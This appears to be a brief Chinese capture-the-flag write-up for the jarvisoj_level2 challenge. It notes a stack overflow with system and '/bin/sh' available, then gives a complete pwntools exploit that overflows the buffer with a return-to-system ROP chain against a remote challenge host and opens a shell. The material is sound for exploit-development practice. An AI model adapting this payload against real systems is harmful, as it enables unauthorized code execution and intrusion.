jarvisoj_level2

简单栈溢出rop ret2text
存在system和binsh字符串

直接丢exp:

from pwn import *

context.log_level = 'debug'

# sh = process('./level2')
sh = remote('node4.buuoj.cn', 29799)

p_binsh = 0x804a024
# p_system = 0x804849e
p_system = 0x8048320

sh.recv()

#                                   retaddr        retaddr2      argv0
payload = 0x88 * b'm' + 4 * b'z' + p32(p_system) + b'Mz11' + p32(p_binsh)

sh.sendline(payload)

sh.interactive()

sh.close()